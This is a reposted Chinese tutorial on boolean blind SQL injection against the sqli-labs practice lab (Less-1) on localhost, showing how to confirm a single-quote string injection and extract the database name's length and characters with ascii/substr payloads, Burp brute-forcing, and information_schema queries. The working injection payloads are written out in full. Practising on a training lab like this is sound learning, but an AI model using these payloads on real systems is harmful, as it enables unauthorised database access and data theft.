SQL注入之盲注sqli-labs-master
来源:互联网 发布:spss数据转换 编辑:程序博客网 时间:2024/05/22 00:19
sql注入首先寻找注入点,然后判断注入类型(整形,字符型),是单引号闭合,双引号闭合......,如果有过滤的话,是吃掉过滤还是阻断。来看例子:
http://localhost/sqli-labs-master/Less-1/?id=1
返回正常。
http://localhost/sqli-labs-master/Less-1/?id=1-2
还是返回正常,但这时id=1-2为-1,如果是整形的话:
http://localhost/sqli-labs-master/Less-1/?id=-1该返回
但现在返回正常,由此可判断注入类型为字符型。输入id=1'
http://localhost/sqli-labs-master/Less-1/?id=1'
可得是字符型的单引号闭合。基于此我们来对sqli-labs-master\Less-1进行盲注。
1.爆数据库名的长度:
http://localhost/sqli-labs-master/Less-1/index.php?id=1' and (select (length(database())))=1-- -database()表示选择当前数据库,-- -为注释符。用burpsuit抓包对长度进行爆破:
Payloads:
结果排序:
得数据库名长度为8位。
2. 爆数据库名:
爆数据库名第一个字符:
http://localhost/sqli-labs-master/Less-1/index.php?id=1' and (select ascii(substr(database(),1,1))) = 1--+
Payloads:
第一个字符的ascii码为115,对应字符s.查第二个字符:
http://localhost/sqli-labs-master/Less-1/index.php?id=1' and (select ascii(substr(database(),2,1))) = 1--+
第二个字符的ascii码为101对应字符e,以此类推爆出当前数据库名: security。
select schema_name frominformation_schema.SCHEMATA limit 0,1 //查找第一个数据库名
select schema_name frominformation_schema.SCHEMATA limit 1,1 //查找第二个数据库名
limit 0,1选取结果第一个,limit 1,1选取结果第二个,以此类推。这里先暂缓一下,余下爆表,列以及内容后面补充。
阅读全文
0 0
- SQL注入之盲注sqli-labs-master
- SQL注入之手工注入sqli-labs-master
- SQL注入之sqlmap爆破sqli-labs-master
- 【SQL注入之sqli-labs】Less 1
- 【SQL注入之sqli-labs】Less 6
- SQL注入练习平台sqli-labs
- 通过sqli-labs学习sql注入——基础挑战之less1-10
- 通过sqli-labs学习sql注入——基础挑战之less11-22
- 通过sqli-labs学习sql注入——进阶挑战之less23-28a
- sqli-labs的sql注入——基础挑战之less11
- 【SQL注入】windows下sqli-labs的搭建
- Sqli-labs学习SQL注入-Lesson 1-10总结
- Sqli-labs学习SQL注入-Lesson 11-20总结
- Sqli-labs之Less1-10
- sqli-labs lesson1字符型注入
- sqli-labs
- sqli-labs
- sqli labs 第二课 sql分析
- Minidlna
- UIScrollView的contentView 助于理解
- 上传项目到远程仓库GitHub(转)
- 单词查找树
- mysql 基于binlog恢复
- SQL注入之盲注sqli-labs-master
- mybatis中自定义ObjectFactory
- oracleday22(备份 恢复 卸载)
- package com.w3ang.learning.https; import java.security.cert.CertificateException; import java.secur
- 数组的常用编辑
- kmp入门--hd 2203 亲和串
- LaTeX在双栏模式下插入跨栏图表
- 我账号的私信总是被删,请勿私信联系
- 第2课:通过案例对SparkStreaming 透彻理解三板斧之二:解密SparkStreaming运行机制和架构